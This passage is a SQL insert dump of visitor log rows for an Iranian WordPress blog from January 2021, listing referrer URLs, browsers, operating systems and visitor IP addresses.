(7855,'2021-01-08','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.6','000',0,1,0),
(7856,'2021-01-08','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.38','000',0,1,0),
(7857,'2021-01-08','http://ictbank.ir/blog','Android Browser','Android','4.0.4',NULL,NULL,'','194.150.167.80','000',0,2,0),
(7858,'2021-01-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.139.246','000',0,1,0),
(7859,'2021-01-08','http://ictbank.ir/blog','Safari','iOS','3.2',NULL,NULL,'','220.181.77.162','000',0,2,0),
(7860,'2021-01-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7861,'2021-01-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(7862,'2021-01-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.255.133.51','000',0,1,0),
(7863,'2021-01-08','http://ictbank.ir/blog','Opera Devices','Unknown','Unknown',NULL,NULL,'','84.17.36.151','000',0,2,0),
(7864,'2021-01-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.194.65','000',0,1,0),
(7865,'2021-01-08','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','41.105.108.171','000',0,1,0),
(7866,'2021-01-08','https://www.google.ru/','Firefox','Linux','Unknown',NULL,NULL,'','178.255.168.32','000',0,2,0),
(7867,'2021-01-08','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','141.98.102.132','000',0,2,0),
(7868,'2021-01-08','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','190.53.123.41','000',0,1,0),
(7869,'2021-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(7870,'2021-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(7871,'2021-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7872,'2021-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7873,'2021-01-08','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','185.128.27.228','000',0,2,0),
(7874,'2021-01-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.124.218','000',0,1,0),
(7875,'2021-01-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','193.112.94.225','000',0,3,0),
(7876,'2021-01-08','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','27.74.252.202','000',0,2,0),
(7877,'2021-01-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','5.8.16.78','000',0,1,0),
(7878,'2021-01-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','132.148.80.37','000',0,1,0),
(7879,'2021-01-08','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','195.206.107.7','000',0,2,0),
(7880,'2021-01-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(7881,'2021-01-09','http://ictbank.ir/blog','Opera','Windows','6.0',NULL,NULL,'','141.98.102.132','000',0,2,0),
(7882,'2021-01-09','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','109.70.144.27','000',0,2,0),
(7883,'2021-01-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','103.13.29.198','000',0,1,0),
(7884,'2021-01-09','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','35.245.188.175','000',0,2,0),
(7885,'2021-01-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','134.19.189.236','000',0,2,0),
(7886,'2021-01-09','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','5.180.62.157','000',0,2,0),
(7887,'2021-01-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.3.217.46','000',0,1,0),
(7888,'2021-01-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','185.81.98.123','000',0,4,0),
(7889,'2021-01-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,11,0),
(7890,'2021-01-09','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','84.17.62.231','000',0,2,0),
(7891,'2021-01-09','http://ictbank.ir/blog','Chrome','Android','10',NULL,NULL,'','86.55.100.12','000',0,2,0),
(7892,'2021-01-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.202.253.78','000',0,1,0),
(7893,'2021-01-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.141.133','000',0,1,0),
(7894,'2021-01-09','http://ictbank.ir/blog','Android Browser','Android','4.4.4',NULL,NULL,'','62.210.11.185','000',0,2,0),
(7895,'2021-01-09','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','201.0.149.40','000',0,2,0),
(7896,'2021-01-09','http://design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','188.163.89.143','000',0,1,0),
(7897,'2021-01-09','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','84.201.139.177','000',0,1,0),
(7898,'2021-01-09','http://ictbank.ir/blog','UC Browser','Android','7.0',NULL,NULL,'','185.245.85.172','000',0,2,0),
(7899,'2021-01-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.82.230','000',0,1,0),
(7900,'2021-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','5.8.16.110','000',0,1,0),
(7901,'2021-01-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(7902,'2021-01-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7903,'2021-01-09','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,1,0),
(7904,'2021-01-09','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','45.152.181.20','000',0,2,0),
(7905,'2021-01-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.146.34','000',0,1,0),
(7906,'2021-01-09','http://ictbank.ir/blog','Samsung Internet','Android','5.0',NULL,NULL,'','194.110.84.121','000',0,2,0),
(7907,'2021-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(7908,'2021-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(7909,'2021-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7910,'2021-01-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(7911,'2021-01-09','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','201.14.148.60','000',0,2,0),
(7912,'2021-01-09','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(7913,'2021-01-09','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','185.236.42.71','000',0,2,0),
(7914,'2021-01-09','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','89.40.183.7','000',0,2,0),
(7915,'2021-01-10','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.229.216.85','000',0,1,0),
(7916,'2021-01-10','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','5.180.62.157','000',0,2,0),
(7917,'2021-01-10','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','50.116.78.109','000',0,1,0),
(7918,'2021-01-10','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,1,0),
(7919,'2021-01-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,1,0),
(7920,'2021-01-10','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.241.211.131','000',0,1,0),
(7921,'2021-01-10','http://ictbank.ir/blog','UC Browser','Android','5.1.1',NULL,NULL,'','194.36.110.246','000',0,2,0),
(7922,'2021-01-10','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','190.123.219.34','000',0,1,0),
(7923,'2021-01-10','http://ictbank.ir/blog','Unknown','Android','7.1.2',NULL,NULL,'','178.239.160.198','000',0,2,0),
(7924,'2021-01-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.8.91.58','000',0,2,0),
(7925,'2021-01-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(7926,'2021-01-10','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.12.172.48','000',0,3,0),
(7927,'2021-01-10','http://design-arena.ir/blog','Firefox','OS X','10.15',NULL,NULL,'','52.212.188.114','000',0,1,0),
(7928,'2021-01-10','http://ictbank.ir/blog','Yandex Browser','Windows','6.2',NULL,NULL,'','84.17.59.156','000',0,2,0),
(7929,'2021-01-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.127.8','000',0,1,0),
(7930,'2021-01-10','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','93.177.74.166','000',0,2,0),
(7931,'2021-01-10','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.22.222.245','000',0,1,0),
(7932,'2021-01-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','198.74.61.81','000',0,1,0),
(7933,'2021-01-10','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.234.244.246','000',0,1,0),
(7934,'2021-01-10','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','217.146.82.202','000',0,2,0),
(7935,'2021-01-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.36','000',0,4,0),
(7936,'2021-01-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.65.191.18','000',0,1,0),
(7937,'2021-01-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','89.216.102.233','000',0,1,0),
(7938,'2021-01-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.119','000',0,1,0),
(7939,'2021-01-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.115.99','000',0,1,0),
(7940,'2021-01-10','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','45.83.91.188','000',0,2,0),
(7941,'2021-01-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(7942,'2021-01-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(7943,'2021-01-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7944,'2021-01-10','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','31.5.97.155','000',0,2,0),
(7945,'2021-01-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(7946,'2021-01-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(7947,'2021-01-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(7948,'2021-01-10','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','87.15.209.189','000',0,1,0),
(7949,'2021-01-10','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','134.19.189.124','000',0,2,0),
(7950,'2021-01-10','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','212.129.0.11','000',0,1,0),
(7951,'2021-01-10','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','82.102.18.244','000',0,2,0),
(7952,'2021-01-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(7953,'2021-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.0',NULL,NULL,'','217.146.82.202','000',0,2,0),
(7954,'2021-01-11','http://ictbank.ir/blog','Instagram','Android','7.1.1',NULL,NULL,'','93.177.74.166','000',0,2,0),
(7955,'2021-01-11','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','196.240.57.44','000',0,2,0),
(7956,'2021-01-11','http://ictbank.ir/blog','Chrome','Android','8.1.0',NULL,NULL,'','185.100.87.250','000',0,1,0),
(7957,'2021-01-11','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','189.91.97.52','000',0,2,0),
(7958,'2021-01-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','94.46.223.20','000',0,2,0),
(7959,'2021-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','36.77.113.14','000',0,1,0),
(7960,'2021-01-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.73.2','000',0,1,0),
(7961,'2021-01-11','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','95.154.139.231','000',0,1,0),
(7962,'2021-01-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','93.86.51.146','000',0,3,0),
(7963,'2021-01-11','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','194.110.84.145','000',0,2,0),
(7964,'2021-01-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.97.185.129','000',0,1,0),
(7965,'2021-01-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','177.200.66.72','000',0,1,0),
(7966,'2021-01-11','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.238.255.94','000',0,1,0),
(7967,'2021-01-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.69.229','000',0,1,0),
(7968,'2021-01-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,1,0),
(7969,'2021-01-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(7970,'2021-01-11','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','37.120.204.156','000',0,2,0),
(7971,'2021-01-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(7972,'2021-01-11','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','91.162.226.31','000',0,2,0),
(7973,'2021-01-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','141.98.10.217','000',0,1,0),
(7974,'2021-01-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(7975,'2021-01-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(7976,'2021-01-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(7977,'2021-01-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(7978,'2021-01-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.143','000',0,1,0),
(7979,'2021-01-11','http://ictbank.ir/blog','Instagram','Android','8.0.0',NULL,NULL,'','185.244.214.20','000',0,2,0),
(7980,'2021-01-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(7981,'2021-01-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(7982,'2021-01-11','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','45.12.223.228','000',0,2,0),
(7983,'2021-01-11','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','185.130.54.101','000',0,1,0),
(7984,'2021-01-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(7985,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.160.111.92','000',0,1,0),
(7986,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','83.169.20.76','000',0,2,0),
(7987,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.71.3.90','000',0,1,0),
(7988,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.56.63.221','000',0,1,0),
(7989,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.35','000',0,2,0),
(7990,'2021-01-12','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','212.129.20.162','000',0,2,0),
(7991,'2021-01-12','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','178.173.225.48','000',0,1,0),
(7992,'2021-01-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','2.59.241.174','000',0,2,0),
(7993,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.107.47.215','000',0,1,0),
(7994,'2021-01-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','185.220.103.7','000',0,1,0),
(7995,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','84.17.36.141','000',0,2,0),
(7996,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.247.181.165','000',0,1,0),
(7997,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','7.1',NULL,NULL,'','45.154.255.72','000',0,1,0),
(7998,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.5.213.123','000',0,62,0),
(7999,'2021-01-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','165.231.33.188','000',0,2,0),
(8000,'2021-01-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8001,'2021-01-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','93.86.51.146','000',0,1,0),
(8002,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.94.37','000',0,1,0),
(8003,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.146.82.202','000',0,2,0),
(8004,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.239.193.124','000',0,1,0),
(8005,'2021-01-12','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','95.107.212.59','000',0,2,0),
(8006,'2021-01-12','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(8007,'2021-01-12','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','185.189.113.60','000',0,1,0),
(8008,'2021-01-12','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','194.35.233.13','000',0,2,0),
(8009,'2021-01-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.203.17','000',0,2,0),
(8010,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,10,0),
(8011,'2021-01-12','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','195.12.50.228','000',0,4,0),
(8012,'2021-01-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.144.247','000',0,1,0),
(8013,'2021-01-12','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','100.27.49.16','000',0,1,0),
(8014,'2021-01-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','194.165.16.78','000',0,1,0),
(8015,'2021-01-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.146.34','000',0,1,0),
(8016,'2021-01-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(8017,'2021-01-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','34.95.185.149','000',0,15,0),
(8018,'2021-01-12','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','164.85.87.120','000',0,1,0),
(8019,'2021-01-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(8020,'2021-01-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(8021,'2021-01-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(8022,'2021-01-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','188.166.80.208','000',0,1,0),
(8023,'2021-01-12','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','195.206.107.19','000',0,2,0),
(8024,'2021-01-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(8025,'2021-01-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(8026,'2021-01-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.245.84.100','000',0,2,0),
(8027,'2021-01-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(8028,'2021-01-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','217.138.219.135','000',0,2,0),
(8029,'2021-01-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(8030,'2021-01-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8031,'2021-01-13','http://ictbank.ir/blog','Unknown','Android','6.0.1',NULL,NULL,'','217.138.207.188','000',0,2,0),
(8032,'2021-01-13','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','42.5.45.135','000',0,1,0),
(8033,'2021-01-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.56.169.117','000',0,1,0),
(8034,'2021-01-13','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','5.113.26.194','000',0,1,0),
(8035,'2021-01-13','http://ictbank.ir/blog','Instagram','Android','7.1.1',NULL,NULL,'','193.56.252.76','000',0,1,0),
(8036,'2021-01-13','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','118.99.109.197','000',0,2,0),
(8037,'2021-01-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.3.220.4','000',0,1,0),
(8038,'2021-01-13','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','185.245.84.100','000',0,2,0),
(8039,'2021-01-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.254.201.209','000',0,2,0),
(8040,'2021-01-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(8041,'2021-01-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.31.11','000',0,1,0),
(8042,'2021-01-13','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','194.110.84.145','000',0,2,0),
(8043,'2021-01-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.7','000',0,1,0),
(8044,'2021-01-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','188.166.80.208','000',0,1,0),
(8045,'2021-01-13','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.215.186.127','000',0,1,0),
(8046,'2021-01-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.141.242','000',0,1,0),
(8047,'2021-01-13','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','171.245.201.181','000',0,3,0),
(8048,'2021-01-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','194.31.54.4','000',0,2,0),
(8049,'2021-01-13','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','181.129.191.130','000',0,1,0),
(8050,'2021-01-13','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','177.254.20.62','000',0,1,0),
(8051,'2021-01-13','http://design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','14.235.43.230','000',0,2,0),
(8052,'2021-01-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.138.192.100','000',0,2,0),
(8053,'2021-01-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,1,0),
(8054,'2021-01-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.147.205','000',0,1,0),
(8055,'2021-01-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8056,'2021-01-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(8057,'2021-01-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8058,'2021-01-13','http://ictbank.ir/blog','Unknown','Android','7.1.2',NULL,NULL,'','89.40.183.136','000',0,2,0),
(8059,'2021-01-13','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress','Chrome','Windows','10.0',NULL,NULL,'','93.178.5.169','000',0,3,0),
(8060,'2021-01-13','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','80.79.116.134','000',0,2,0),
(8061,'2021-01-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.138.197.220','000',0,2,0),
(8062,'2021-01-14','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','5.180.62.52','000',0,2,0),
(8063,'2021-01-14','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','45.226.118.206','000',0,7,0),
(8064,'2021-01-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(8065,'2021-01-14','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','125.165.224.215','000',0,2,0),
(8066,'2021-01-14','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','196.196.203.124','000',0,2,0),
(8067,'2021-01-14','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','37.120.197.60','000',0,4,0),
(8068,'2021-01-14','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.222.47','000',0,1,0),
(8069,'2021-01-14','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','213.160.157.10','000',0,1,0),
(8070,'2021-01-14','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','178.159.37.24','000',0,1,0),
(8071,'2021-01-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(8072,'2021-01-14','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','195.181.174.89','000',0,2,0),
(8073,'2021-01-14','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','124.79.248.180','000',0,1,0),
(8074,'2021-01-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.192.4','000',0,1,0),
(8075,'2021-01-14','http://ictbank.ir/blog','Unknown','FireOS','5',NULL,NULL,'','185.216.35.121','000',0,2,0),
(8076,'2021-01-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.220.100.246','000',0,1,0),
(8077,'2021-01-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.220.100.240','000',0,1,0),
(8078,'2021-01-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','135.148.33.86','000',0,1,0),
(8079,'2021-01-14','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','95.10.2.78','000',0,1,0),
(8080,'2021-01-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8081,'2021-01-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.33.215.74','000',0,1,0),
